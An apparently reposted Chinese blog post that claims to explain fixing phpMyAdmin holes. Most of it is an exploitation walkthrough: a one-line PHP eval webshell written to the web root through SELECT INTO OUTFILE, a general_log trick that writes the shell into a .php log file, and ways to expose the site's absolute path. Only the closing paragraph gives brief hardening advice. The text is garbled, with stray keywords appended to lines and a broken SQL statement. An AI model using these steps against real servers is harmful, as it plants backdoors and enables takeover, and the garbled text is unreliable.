修復網站漏洞對phpmyadmin防止被入侵提權的解決辦法

phpmyadmin是不少網站用來管理數據庫的一個系統,尤爲是mysql數據庫管理的較多一些,最近phpmysql爆出漏洞,尤爲是弱口令,sql注入漏洞,都會致使mysql的數據帳號密碼被泄露,那麼如何經過phpmyadmin來上傳提權webshell呢php

首先咱們來搭建一下PHP+mysql環境,linux centos系統,PHP的版本是5.3,mysql版本是5.6,linux系統64位,apache 2.2版本,部署在新開的一臺阿里雲的按量付費ECS服務器。mysql

phpmyadmin漏洞利用linux

利用mysql數據庫select into outfile方式來寫入webshell到網站的根目錄下,該漏洞的利用前提是必須知道網站的當前路徑是多少,如何知道網站的當前路徑,這個要經過爆出網站的錯誤來進行查看絕對的路徑。使用下面的代碼:web

select load_file('/home/www/safe.php')sql

select '<?php eval($_POST[sine]); ?>' into outfile '/home/www/safe.php';shell

執行這個語句就能夠生成一句話的木馬後門。數據庫

也能夠使用寫數據庫日誌的方式來進行漏洞的利用,前提是mysql的版本都是5.0以上的,以及日誌開啓,若是沒有開啓日誌功能,咱們須要在phpmyadmin裏進行開啓,語句以下:set globalgener al_log = "ON";這個數據庫語句就是開啓日誌的功能。查看當前數據庫是否開啓,能夠使用語句查看到SHOW VARIABLES LIKE 'general%'就能夠看到是否開啓日誌了,日誌開啓成功,那麼咱們把日誌的文件改成php,這樣就能夠記錄日誌到php文件當中去了,咱們在操做語句的時候能夠把一句話網站後門代碼寫到日誌文件當中去進行執行。apache

關於phpmyadmin網站的絕對路徑獲取,能夠使用單引號來進行錯誤測試,在ID值後門加上單引號,有些網站就會爆出絕對的網站路徑,再一個使用錯誤的賦值好比ID=1是正常,那麼咱們能夠使用ID=-1,來進行報錯,也能夠使用搜索引擎來查看網站的快照,看看是否存在一些錯誤的快照收錄,不少網站會留下一些測試的代碼,好比phpinfo這樣的代碼,文件地址是text.php 1.php phpinfo.php等待的文件。centos

以上就是phpmyadmin漏洞利用,以及如何提權拿webshell的一些利用技巧,關於phpmyadmin漏洞的修復,SINE安全建議管理員關閉掉phpmyadmin的對外訪問,只容許在服務器裏打開phpmyadmin的界面,外網沒法打開。對網站的根目錄部署防篡改安全防禦,禁止新增PHP文件。安全

相關文章
相關標籤/搜索